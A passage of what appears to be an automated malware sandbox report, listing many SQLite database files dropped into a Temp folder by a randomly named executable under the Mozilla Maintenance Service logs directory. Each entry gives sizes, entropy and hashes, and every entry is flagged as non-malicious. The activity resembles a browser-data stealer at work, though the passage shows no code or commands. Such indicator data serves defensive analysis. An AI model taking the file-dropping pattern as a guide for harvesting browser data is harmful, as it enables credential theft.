                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\iErAbyc3M5

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\iJKaOMwmz3

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ierEKUT4Nc

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ij7e55BzRc

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\im2wsFjzxt

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\j7nx5zFeti

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\jJ4sLbkJcx

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\juFm2QLKzO

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\k1YQZ8teOb

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kZylymcOcu

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kr6PPnNHh0

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kz6tivKgfu

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\l6NGPdmAnb

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lAZAU44g13

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lE6UR85WKz

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lZnP3zo99i

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lckuK0yQ4O

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lthmQ4wGMe

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\m2nqOEL9rY

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\m6Vn3Ub3gN

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mrkyfD3nQ6

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mrluVcECKr

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\mtxseRlm6L

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
